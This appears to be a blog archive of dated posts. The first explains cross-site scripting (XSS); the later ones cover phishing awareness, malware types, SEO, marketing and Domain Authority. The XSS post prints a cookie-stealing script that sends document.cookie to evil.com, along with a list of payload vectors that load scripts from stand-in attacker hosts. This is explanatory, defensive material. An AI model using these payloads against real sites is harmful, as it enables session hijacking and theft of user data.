Wednesday, 20 April 2022

Cross-site scripting (XSS) attack

Cross-site Scripting (XSS)

Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in the web browser of the victim by including malicious code in a legitimate web page or web application. The actual attack occurs when the victim visits the web page or web application that executes the malicious code. The web page or web application becomes a vehicle to deliver the malicious script to the user’s browser. Vulnerable vehicles that are commonly used for Cross-site Scripting attacks are forums, message boards, and web pages that allow comments.

A web page or web application is vulnerable to XSS if it uses unsanitized user input in the output that it generates. This user input must then be parsed by the victim’s browser. XSS attacks are possible in VBScript, ActiveX, Flash, and even CSS. However, they are most common in JavaScript, primarily because JavaScript is fundamental to most browsing experiences.

“Isn’t Cross-site Scripting the User’s Problem?”

If an attacker can abuse an XSS vulnerability on a web page to execute arbitrary JavaScript in a user’s browser, the security of that vulnerable website or vulnerable web application and its users has been compromised. XSS is not the user’s problem like any other security vulnerability. If it is affecting your users, it affects you.

Cross-site Scripting may also be used to deface a website instead of targeting the user. The attacker can use injected scripts to change the content of the website or even redirect the browser to another web page, for example, one that contains malicious code.


What Can the Attacker Do with JavaScript?

XSS vulnerabilities are perceived as less dangerous than for example SQL injection vulnerabilities. The consequences of the ability to execute JavaScript on a web page may not seem dire at first. Most web browsers run JavaScript in a very tightly controlled environment. JavaScript has limited access to the user’s operating system and the user’s files. However, JavaScript can still be dangerous if misused as part of malicious content:

Malicious JavaScript has access to all the objects that the rest of the web page has access to. This includes access to the user’s cookies. Cookies are often used to store session tokens. If an attacker can obtain a user’s session cookie, they can impersonate that user, perform actions on behalf of the user, and gain access to the user’s sensitive data.

JavaScript can read the browser DOM and make arbitrary modifications to it. Luckily, this is only possible within the page where JavaScript is running.

JavaScript can use the XMLht tp request object to send HTTP requests with arbitrary content to arbitrary destinations.

JavaScript in modern browsers can use HTML5 APIs. For example, it can gain access to the user’s geolocation, webcam, microphone, and even specific files from the user’s file system. Most of these APIs require user opt-in, but the attacker can use social engineering to go around that limitation.

The above, in combination with social engineering, allow criminals to pull off advanced attacks including cookie theft, planting trojans, keylogging, phishing, and identity theft. XSS vulnerabilities provide the perfect ground to escalate attacks to more serious ones. Cross-site Scripting can also be used in conjunction with other types of attacks, for example, Cross-site request forgery (CSRF) . 

There are several types of Cross-site Scripting attacks: stored/persistent XSS reflected-non-persistent XSS. and DOM-based XSS.  You can read more about them in an article titled Types of XSS.


How Cross-site Scripting Works

There are two stages to a typical XSS attack:

To run malicious JavaScript code in a victim’s browser, an attacker must first find a way to inject malicious code (payload) into a web page that the victim visits.

After that, the victim must visit the web page with the malicious code. If the attack is directed at particular victims, the attacker can use social engineering and/or phishing to send a malicious URL to the victim.

For step one to be possible, the vulnerable website needs to directly include user input in its pages. An attacker can then insert a malicious string that will be used within the web page and treated as source code by the victim’s browser. There are also variants of XSS attacks where the attacker lures the user to visit a URL using social engineering and the payload is part of the link that the user clicks.

The following is a snippet of server-side pseudocode that is used to display the most recent comment on a web page:


print "<html>" print "<h1>Most recent comment</h1>" print database.latestComment print "</html>"


The above script simply takes the latest comment from a database and includes it in an HTML page. It assumes that the comment printed out consists of only text and contains no HTML tags or other code. It is vulnerable to XSS, because an attacker could submit a comment that contains a malicious payload, for example:


<script>dosomethingEvil,( );</scrpt>

The web server provides the following HTML code to users that visit this web page:

<html> <h1>Most recent comment</h1> <script>doSomethingEvil();</script> </html>

When the page loads in the victim’s browser, the attacker’s malicious script executes. Most often, the victim does not realize it and is unable to prevent such an attack.

Stealing Cookies Using XSS

Criminals often use XSS to steal cookies. This allows them to impersonate the victim. The attacker can send the cookie to their own server in many ways. One of them is to execute the following client-side script in the victim’s browser:

<script>

window.location="http://evil.com/?cookie=" + document.cookie

</script>




The figure below illustrates a step-by-step walkthrough of a simple XSS attack.

The attacker injects a payload into the website’s database by submitting a vulnerable form with malicious JavaScript content.

The victim requests the web page from the webserver.

The web server serves the victim’s browser the page with the attacker’s payload as part of the HTML body.

The victim’s browser executes the malicious script contained in the HTML body. In this case, it sends the victim’s cookie to the attacker’s server.

The attacker now simply needs to extract the victim’s cookie when the HTTP request arrives at the server.

The attacker can now use the victim’s stolen cookie for impersonation.

Cross-site Scripting Attack Vectors

The following is a list of common XSS attack vectors that an attacker could use to compromise the security of a website or web application through an XSS attack. A more extensive list of XSS payload examples is maintained by the OWASP organization: Xss Filter Evasion Cheat Sheet.


<script> tag

The <script> tag is the most straightforward XSS payload. A script tag can reference external JavaScript code or you can embed the code within the script tag itself.


<!-- External script --> <script src=http://evil.com/xss.js></script> <!-- Embedded script --> <script> alert("XSS"); </script>


JavaScript events

JavaScript event attributes such as onload and onerror can be used in many different tags. This is a very popular XSS attack vector.

<!-- onload attribute in the <body> tag --> <body onload=alert("XSS")>


<body> tag

An XSS payload can be delivered inside the <body> by using event attributes (see above) or other more obscure attributes such as the background attribute.

<!-- background attribute --> <body background="javascript:alert("XSS")">

<img> tag

Some browsers execute JavaScript found in the <img> attributes.

<!-- <img> tag XSS --> <img src="javascript:alert("XSS");"> <!-- tag XSS using lesser-known attributes --> <img dynsrc="javascript:alert('XSS')"> <img lowsrc="javascript:alert('XSS')">


<iframe> tag

The <iframe> tag lets you embed another HTML page in the current page. An IFrame may contain JavaScript but JavaScript in the IFrame does not have access to the DOM of the parent page due to the Content Security Policy (CSP) of the browser. However, IFrames are still very effective for pulling off phishing attacks.


<!-- <iframe> tag XSS --> <iframe src="http://evil.com/xss.html">


<input> tag

In some browsers, if the type attribute of the <input> tag is set to image, it can be manipulated to embed a script.

<!-- <input> tag XSS --> <input type="image" src="javascript:alert('XSS');">


<link> tag

The <link> tag, which is often used to link to external style sheets, may contain a script.


<!-- <link> tag XSS --> <link rel="stylesheet" href="javascript:alert('XSS');">


<table> tag

The background attribute of the <table> and <td> tags can be exploited to refer to a script instead of an image.

<!-- <table> tag XSS --> <table background="javascript:alert('XSS')"> <!-- <td> tag XSS --> <td background="javascript:alert('XSS')">


<div> tag

The <div> tag, similar to the <table> and <td> tags, can also specify a background and therefore embed a script.


<!-- <div> tag XSS --> <div style="background-image: url(javascript:alert('XSS'))"> <!-- <div> tag XSS --> <div style="width: expression(alert('XSS'));">

<object> tag

The <object> tag can be used to include a script from an external site

<!-- <object> tag XSS --> <object type="text/x-scriptlet" data="http://hacker.com/xss.html">


Is Your Website or Web Application Vulnerable to Cross-site Scripting

Cross-site Scripting vulnerabilities are one of the most common web application vulnerabilities. The OWASP organization (Open Web Application Security Project) lists XSS vulnerabilities in their OWASP Top 10 2017  document as the second most prevalent issue.

Fortunately, it’s easy to test if your website or web application is vulnerable to XSS and other vulnerabilities by running an automated web scan using the Acunetix vulnerability scanner, which includes a specialized XSS scanner module. Take a demo and find out more about running XSS scans against your website or web application. An example of how you can detect blind XSS vulnerabilities with Acunetix is available in the following article: How to Detect Blind XSS Vulnerabilities.

How to Prevent XSS

To keep yourself safe from XSS, you must sanitize your input. Your application code should never output data received as input directly to the browser without checking it for malicious code.

For more details, refer to the following articles: 

preventing XSS attacks and how to prevent  DOM-based  Cross-site  Scripting. You can also find useful information in the Xss preventing Cheat Sheet maintained by the OWASP organization.





Tuesday, 19 April 2022

Phishing (cyberattacks topic 2)

Phishing occurs when hackers pose as a trusted figure who uses carefully crafted emails to trick you into visiting a malicious website, downloading a corrupt file, or handing over your password before using that information to gain access to a business network or your personal information. One of the most common ways phishing occurs is by using the art of storytelling to entice users to interact with a link or attachment. 

These could include tactics such as:

Including a fake invoice

Asking you to confirm your personal information

Claiming there’s a problem with your account or payment information

Notifying you of a suspicious activity or log-in attempts

Asking you to click a link to submit a payment

Spot An Attack:

The best way to avoid a phishing scam is to learn the different types of phishing attacks a user can experience. Hackers often have more success phishing employees because they spend the majority of their day clicking on links and downloading files for work. Here are a few examples of misleading information scammers use to entice users to interact with their emails: 

Fake shipping or delivery notifications

Fake purchase confirmations & invoices

Requests for personal information

Promises of attractive rewards

Charity or gift card scams

Use of urgent or threatening language

Unexpected emails

These are just a few ways that a scammer will try to trick you into clicking a link or opening a  dangerous attachment. You always want to pay attention to a few key details when trying to determine if an email is safe or not. 

Look at factors like:

Who is sending the email- If you don’t immediately recognize the sender, you’ll want to see if the person or business name is spelled correctly. Another way to identify a suspicious sender is looking to see there are a bunch of random characters instead of a clear email address.

Who is the intended recipient?

 Hackers can target recipients within your organization who could have access to private company details. If you are a person who manages confidential information like finances, customer data, or intellectual property, please be aware that you are a prime target for hackers.

Subject Line- Always examine the subject line of an email before opening or responding to it. Seeing grammar or misspellings from an accredited business or institution is often a clear indicator of a suspicious email.

Any suspicious links or attachments- Phishing emails often include outbound links that will redirect you to a page that is broken or not a true URL. Hover over any links in the email and see if they look legitimate, if you don’t recognize the link, don’t click it

The type of content in the email – Examine the overall tone of the email. You should always read the content for clarity and grammar before responding or engaging with an email.

Don’t forget that as we all continue to work from home it’s extremely important for the safety of you and your company’s information that you don’t open any suspicious or unwanted emails.

How To Protect Yourself From Phishing Attacks

While we would love to think that our email provider is perfect and will automatically filter out any suspicious or wanted emails, that’s not always the case. Scammers have gotten better at outsmarting the spam filters which makes it easier for them to make their way to your inbox. It’s always a good idea to have a few extra layers of protection to prevent phishing attacks.

Think before you click on any links!

Make sure your computer’s security software is up-to-date.

Do not share personal or financial information via links found in emails.

Protect your accounts by using multi-factor authentication.

Be cautious and avoid clicking on pop-up dialog boxes.

Your company can provide all the warning and corporate training possible, but if you don’t take the steps to identify and recognize phishing as it happens, you could jeopardize the safety of your private information. 

What To Do If You Suspect A Phishing Attack

If you suspect that you have been the victim of a phishing attack, especially if you have been using a work computer or email address, notify your IT department immediately. is to always keep your information safe and secure from scammers.

Monday, 18 April 2022

Malware, malicious software, including spyware, ransomware, viruses, and worms (cyberattacks)

What is Malware?

Malware is a catch-all term for various malicious software, including viruses, adware, spyware, browser hijacking software, and fake security software. Once installed on your computer, these programs can seriously affect your privacy and your computer's security. For example, malware is known for relaying personal information to advertisers and other third parties without user consent. Some programs are also known for containing worms and viruses that cause a great deal of computer damage.

Types of Malware

  • Viruses are the most commonly-known form of malware and potentially the most destructive. They can do anything from erasing the data on your computer to hijacking your computer to attack other systems, send spam, or host and share illegal content.
  • Spyware collects your personal information and passes it on to interested third parties without your knowledge or consent. Spyware is also known for installing Trojan viruses.
  • Adware displays pop-up advertisements when you are online.
  • Fake security software poses as legitimate software to trick you into opening your system to further infection, providing personal information, or paying for unnecessary or even damaging "clean-ups".
  • Browser hijacking software changes your browser settings (such as your home page and toolbars), displays pop-up ads, and creates new desktop shortcuts. It can also relay your personal preferences to interested third parties.

Facts about Malware

Malware is often bundled with other software and may be installed without your knowledge.
For instance, AOL Instant Messenger comes with WildTangent, a documented malware program. Some peer-to-peer (P2P) applications, such as KaZaA, Gnutella, and LimeWire also bundle spyware and adware. While End User License Agreements (EULA) usually include information about additional programs, some malware is automatically installed, without notification or user consent.

Malware is very difficult to remove.
Malware programs can seldom be uninstalled by conventional means. In addition, they ‘hide’ in unexpected places on your computer (e.g., hidden folders or system files), making their removal complicated and time-consuming. In some cases, you may have to reinstall your operating system to get rid of the infection completely.

Malware threatens your privacy.
Malware programs are known for gathering personal information and relaying it to advertisers and other third parties. The information most typically collected includes your browsing and shopping habits, your computer's IP address, or your identification information.

Malware threatens your computer’s security.
Some types of malware contain files commonly identified as Trojan viruses. Others leave your computer vulnerable to viruses. Regardless of type, malware is notorious for being at the root, whether directly or indirectly, of virus infection, causing conflicts with legitimate software and compromising the security of any operating system, Windows or Macintosh.

How do I know if I have Malware on my computer?

Common symptoms include:

Browser crashes & instabilities

  • The browser closes unexpectedly or stops responding.
  • The home page changes to a different website and cannot be reset.
  • New toolbars are added to the browser.
  • Clicking a link does not work or you are redirected to an unrelated website.

Poor system performance

  • Internet connection stops unexpectedly.
  • The computer stops responding or takes longer to start.
  • Applications do not open or are blocked from downloading updates (especially security programs).
  • New icons are added to the desktop or suspicious programs are installed.
  • Certain system settings or configuration options become unavailable.

Advertising

  • Ads pop up even when the browser is not open.
  • The browser opens automatically to display ads.
  • New pages open in a browser to display ads.
  • Search results pages display only ads.

Sunday, 17 April 2022

Improve your site ranking

Quality, authoritative content is the number one driver of your search engine rankings and there is no substitute for great content—this is especially true when doing SEO marketing. Quality content created specifically for your intended user increases site traffic, which improves your site's authority and relevance. Fine-tune your web writing skills and present yourself as an authority on the topic you are writing about.

Keywords

Identify and target a specific keyword phrase for each authoritative content page on your website. Think about how your reader might search for that specific page with search terms like:

online masters in engineering management

what is biomedical engineering?

title IX education resources

photographing northern lights

how to apply for scholarships?

when is the FAFSA deadline?

what is the difference between engineering and engineering technology?

Multiple Keyword Phrases

It is very difficult for a webpage to achieve search engine rankings for multiple keyword phrases—unless those phrases are very similar. A single page may be able to rank both "biomedical engineering jobs" and "biomedical engineering careers". Ranking for "student affairs" and "dean of students" or "gender discrimination" and "violence reporting procedures" with a single page is unlikely.

If you want to rank for multiple keywords phrases with your website, you will need to make a separate webpage for each keyword phrase you are targeting.

Placing Keywords

Once your keyword phrase is chosen for a given page, consider these questions:

Can I use part or all of the keyword phrases in the page URL (by using keywords in folders)?

Can I use part or all of the keyword phrases in the page title?

Can I use part or all of the keyword phrases in page headings and subheadings?

Answering yes to these questions can improve your search engine ranking. Be natural and user-friendly, though. For instance, you do not want the word "engineering" to show up three or more times in the URL or have the phrase Northern Lights repeated in the page title and also every heading. Readability and usability still trump search engine optimization.

Content

Beyond page URL, title, and headings, content is most influential on search engine rankings. Repeat your keyword phrase several times throughout the page—once or twice in the opening and closing paragraphs, and two to four more times throughout the remaining content. Be authoritative. Strategically link to relevant sources and additional information—both within your organization's broad website and even to other websites which are useful.

Don't forget to use bold, italics, heading tags (especially an H1), and other emphasis tags to highlight these keyword phrases—but don't overdo it. You still want your language and writing style to read naturally. Never sacrifice good writing for SEO. The best pages are written for the user, not for the search engine. Read more about SEO marketing to help you find new content opportunities.

Update Your Content Regularly

You've probably noticed that we feel pretty strongly about content. Search engines do, too. Regularly updated content is viewed as one of the best indicators of a site's relevancy, so be sure to keep it fresh. Audit your content on a set schedule (semesterly for example) and make updates as needed.

Blogging

Writing additional content, rich with keyword phrases, on your departmental news blog can also boost your search engine rankings. Blog posts can even be shorter updates about the specific topics you are targeting. Interlink your related CMS webpages and blog posts when it helps give the reader a better picture or additional information about the topic.

Metadata

When designing your website, each page contains a space between the <head> tags to insert metadata or information about the contents of your page. If you have a CMS site originally produced by the UMC web team will have pre-populated this data for you. However, it is important for you to review and update metadata as your site changes over time.

Title Metadata

Title metadata is responsible for the page titles displayed at the top of a browser window and as the headline within search engine results. It is the most important metadata on your page.

For those with a CMS website, the web team has developed an automated system for creating the meta title for each webpage based on your page title. This adds to the importance of using well-thought-out page titles rich with keyword phrases.

Description Metadata

Description metadata is the textual description that a browser may use in your page search return. Think of it as your site's window display—a concise and appealing description of what is contained within, with the goal of encouraging people to enter. A good meta description will typically contain two full sentences. Search engines may not always use your meta description, but it is important to give them the option.

Keyword Metadata

Keyword metadata is rarely if ever used to tabulate search engine rankings. However, you should already know your keyword phrases, so it doesn't hurt to add them to your keyword metadata. You'll want to include a variety of phrases. As a general rule, try to keep it to about 3-7 phrases with each phrase consisting of 1-4 words. A great example would be a "computer science degree."

 Have a link-worthy site

A webpage that is content-rich, authoritative, unbiased, and helps visitors learn more about what they are interested in is most likely to attract links from other websites, which improves your search engine optimization.

Improve your authority and credibility by adding relevant links within the text. Instead of having "click here" links, try writing out the name of the destination. "Click here" has no search engine value beyond the attached URL, whereas "Michigan Tech Enterprise Program" is rich with keywords and will improve your search engine rankings as well as the ranking of the page you are linking to. Always use descriptive links by linking keywords—it not only improves search engine optimization but also adds value to your readers, including those with disabilities or who are using screen readers.

 Use alt tags

Always describe your image and video media using alt tags, or alternative text descriptions. They allow search engines to locate your page, which is crucial—especially for those who use text-only browsers or screen readers.






Saturday, 16 April 2022

Marketing Strategy

The marketing strategy should revolve around the company's value proposition, which communicates to consumers what the company stands for, how it operates, and why it deserves their business.

This provides marketing teams with a template that should inform their initiatives across all of the company's products and services. For example, Walmart is widely known as a discount retailer with “everyday low prices,” whose business operations and marketing efforts are rooted in that idea

The marketing strategy is outlined in the marketing plan which is a document that details the specific types of marketing activities a company conducts and contains timetables for rolling out various marketing initiatives.

Benefits 

The ultimate goal of a marketing strategy is to achieve and communicate a sustainable competitive advantage over rival companies by understanding the needs and wants of its consumers. Whether it's a print ad design, mass customization, or a social media campaign, a marketing asset can be judged based on how effectively it communicates a company's core value proposition.

Market research can help chart the efficacy of a given campaign and can help identify untapped audiences to achieve bottom-line goals and increase sales.

A marketing strategy will detail the advertising, outreach, and PR campaigns to be carried out by a firm, including how the company will measure the effect of these initiatives. They will typically follow the "four P's". The functions and components of a marketing plan include market research to support pricing decisions and new market entries, tailored messaging  that target certain demographics and geographic areas, platform selection for product and service promotion—digital, radio, Internet, trade magazines, and the mix of those platforms for each campaign, and metrics that measure the results of marketing efforts and their reporting timelines

Marketing Plan

Terms marketing plan and marketing strategy are often used interchangeably because a marketing plan is developed based on an overarching strategic framework. In some cases, the strategy and the plan may be incorporated into one document, particularly for smaller companies that may only run one or two major campaigns in a year. The plan outlines marketing activities on a monthly, quarterly, or annual basis while the marketing strategy outlines the overall value proposition.


Friday, 15 April 2022

Components of Digital Marketing

Advertising

Online advertising involves bidding and buying relevant ad units on third-party sites, such as display ads on blogs, forums, and other relevant websites. Types of ads include images, text, pop-ups, banners, and videos. Retargeting is an important aspect of online advertising. Retargeting requires code that adds an anonymous browser cookie to track new visitors to your site. Then, as that visitor goes to other sites, you can serve them ads for your product or service. This focuses your advertising efforts on people who have already shown interest in your company.

Content marketing

Content marketing is an important strategy for attracting potential customers. Publishing a regular cadence of high-quality, relevant content online will help establish thought leadership. It can educate target customers about the problems your product can help them resolve, as well as boost SEO rankings. Content can include blog posts, case studies, whitepapers, and other materials that provide value to your target audience. These digital content assets can then be used to acquire customers through organic and paid efforts.

Email marketing

Email is a direct marketing method that involves sending promotional messages to a segmented group of prospects or customers. Email marketing continues to be an effective approach for sending personalized messages that target customers’ needs and interests. It is most popular for e-commerce businesses as a way of staying top of mind for consumers.

Mobile marketing

Mobile marketing is the promotion of products or services specifically via mobile phones and devices. This includes mobile advertising through text messages or advertising in downloaded apps. However, a comprehensive mobile marketing approach also includes optimizing websites, landing pages, emails, and content for an optimal experience on mobile devices.

Paid search

Paid search increases search engine visibility by allowing companies to bid for certain keywords and purchase advertising space in the search engine results. Ads are only shown to users who are actively searching for the keywords you have selected. There are two main types of paid search advertising — pay per click (PPC) and cost per mille (CPM). With PPC, you only pay when someone clicks on your ad. With CPM, you pay based on the number of impressions. Google Adwords is the most widely used paid search advertising platform; however, other search engines like Bing also have paid programs.

Programmatic advertising

Programmatic advertising is an automated way of bidding for digital advertising. Each time someone visits a web page, profile data is used to auction the ad impression to competing advertisers. Programmatic advertising provides greater control over what sites your advertisements are displayed on and who is seeing them so you can better target your campaigns.

Reputation marketing

Reputation marketing focuses on gathering and promoting positive online reviews. Reading online reviews can influence customer buying decisions and is an important component of your overall brand and product reputation. An online reputation marketing strategy encourages customers to leave positive reviews on sites where potential customers search for reviews. Many of these review sites also offer native advertising that allows companies to place ads on competitor profiles.

Search engine optimization

Search engine optimization (SEO) focuses on improving organic traffic to your website. SEO activities encompass technical and creative tactics to improve rankings and increase awareness in search engines. The most widely used search engines include Google, Bing, and Yahoo. Digital marketing managers focus on optimizing levers — such as keywords, crosslinks, backlinks, and original content — to maintain a strong ranking.

Social media marketing

Social media marketing is a key component of digital marketing. Platforms such as Facebook, Twitter, Pinterest, Instagram, Tumblr, LinkedIn, and even YouTube provide digital marketing managers with paid opportunities to reach and interact with potential customers. Digital marketing campaigns often combine organic efforts with sponsored content and paid advertising promotions on key social media channels to reach a larger audience and increase brand lift.

Video marketing

Video marketing enables companies to connect with customers in a more visually engaging and interactive way. You can showcase product launches, events, and special announcements, as well as provide educational content and testimonies. YouTube and Vimeo are the most commonly used platforms for sharing and advertising videos. Pre-roll ads (which are shown for the first 5–10 seconds before a video) are another way digital marketing managers can reach audiences on video platforms.

Web analytics

Analytics allows marketing managers to track online user activity. Capturing and analyzing this data is foundational to digital marketing because it gives companies insights into online customer behavior and their preferences. The most widely used tool for analyzing website traffic is Google Analytics, however other tools include Adobe Analytics, Coremetrics, Crazy Egg, and more.

Webinars

Webinars are virtual events that allow companies to interact with potential and existing customers no matter where they are located. Webinars are an effective way to present relevant content — such as a product demonstration or seminar — to a targeted audience in real-time. Engaging directly with your audience in this way gives your company an opportunity to demonstrate deep subject matter expertise.



Thursday, 14 April 2022

Domain Authority

Domain Authority important

Domain Authority (DA) is a search engine ranking score developed by Moz that predicts how likely a website is to rank in search engine result pages (SERPs). Domain Authority scores range from one to 100, with higher scores corresponding to a greater likelihood of ranking.

Domain Authority is based on data from our Link Explorer web index and uses dozens of factors in its calculations. The actual Domain Authority calculation itself uses a machine learning model to predictively find a "best fit" algorithm that most closely correlates our link data with rankings across thousands of actual search results that we use as standards to scale against.

Domain Authority is calculated by evaluating multiple factors, including linking root domains and a total number of links, into a single DA score. This score can then be used when comparing websites or tracking the "ranking strength" of a website over time. Domain Authority is not a Google ranking factor and has no effect on the SERPs.

As of the Domain Authority 2.0 update in early 2019, the calculation of a domain's DA score comes from a machine learning algorithm’s predictions about how often Google is using that domain in its search results. If domain A is more likely to appear in a Google SERP than domain B is, then we would expect domain A's DA to be higher than domain B's DA. Learn more about the Domain Authority update and how to discuss it with your team with this presentation or explore how to use DA 2.0 metrics with this comprehensive whitepaper.  

Since DA is based on machine learning calculations, your site's score will often fluctuate as more, fewer, or different data points become available and are incorporated into those calculations. For instance, if facebook.com were to acquire a billion new links, every other site’s DA would drop relative to Facebook’s. Because more established and authoritative domains like Facebook will have increasingly larger link profiles, they take up more of the high-DA slots, leaving less room at the higher end of the scale for other domains with less robust link profiles. Therefore, it's significantly easier to grow your score from 20 to 30 than it is to grow it from 70 to 80. For this reason, it’s important to use Domain Authority as a comparative metric rather than an absolute one.

Because Domain Authority comprises multiple metrics and calculations, pinpointing the exact cause of a change can be a challenge. If your score has gone up or down, there are many potential influencing factors including things like:

  • Your link profile growth hasn't yet been captured in our web index.
  • The highest-authority sites experienced substantial link growth, skewing the scaling process.
  • You earned links from places that don't contribute to Google rankings.
  • We crawled (and included in our index) more or fewer of your linking domains than we had in a previous crawl.
  • Your Domain Authority is on the lower end of the scoring spectrum and is thus more impacted by scaling fluctuations.
  • Your site was affected by the 2019 implementation of Domain Authority 2.0, which caused a 6% average decrease in DA across all websites due to restructuring and improvements to the way DA is calculated.

The key to understanding Domain Authority fluctuations is recognizing that each domain’s score depends on comparison to other domains all across the DA scale, so that even if a website improves its SEO, its Authority score may not always reflect that. Let's look at how "best of" rankings work as a theoretical illustration:

If Singapore has the best air quality in 2020 and then improves it even further in 2021, are they guaranteed to remain at #1 on the best air quality list? What if Denmark also improves its air quality, or what if New Zealand joins the rating system with extremely high air quality in 2021 after having been left out of the rankings in 2020? Maybe the countries ranking 2–10 all improved dramatically and Singapore falls to #11 even though their air got better during that time. Because the scale itself has changed, Singapore's ranking could change independently of any action (or inaction) on their part.

Domain Authority works in a similar fashion. Since it’s based on machine learning and constantly compared against every other website on the scale, after each update, recalculations mean that the score of a given site could go down even if that site has improved its link profile. Such is the nature of a relative, scaled system. Therefore — and this is important enough that we'll emphasize it once more — Authority scores are best viewed as comparative rather than absolute metrics.

Microsoft Thwarts Chinese Cyber Attack Targeting Western European Governments

  Microsoft on Tuesday   revealed   that it repelled a cyber attack staged by a Chinese nation-state actor targeting two dozen organizations...